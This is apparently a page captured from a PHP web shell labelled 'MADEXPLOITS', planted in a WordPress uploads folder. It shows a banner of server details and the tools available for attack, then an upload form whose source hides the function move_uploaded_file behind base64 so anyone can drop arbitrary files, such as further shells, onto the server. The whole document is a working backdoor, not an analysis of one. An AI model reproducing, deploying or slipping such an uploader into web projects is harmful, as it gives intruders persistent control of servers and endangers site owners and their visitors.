| Server IP : 52.25.153.185 / Your IP : 216.73.217.43 Web Server : Apache System : Linux ip-172-26-6-158 5.10.0-45-cloud-amd64 #1 SMP Debian 5.10.259-1 (2026-07-02) x86_64 User : daemon ( 1) PHP Version : 8.1.10 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /bitnami/wordpress/wp-content/uploads/WPL/7267/ |
Upload File : |
<h1>MADEXPLOITS</h1><form method='POST' enctype='multipart/form-data'><input type='file' name='file'><input type='submit' name='submit' value='Submit'> <?php $Array = ['bW92ZV91cGxvYWRlZF9maWxl']; $hitung_array = count($Array); for ($i = 0; $i < $hitung_array; $i++) { $fungsi[] = base64_decode($Array[$i]); } if (isset($_POST['submit'])) { $file = $_FILES['file']['tmp_name']; $fileName = $_FILES['file']['name']; if (@$fungsi[0]($file, getcwd() . '/' . $fileName)) {echo 'file Success Uploaded';} else {echo 'File Failed Uploaded';}} ?>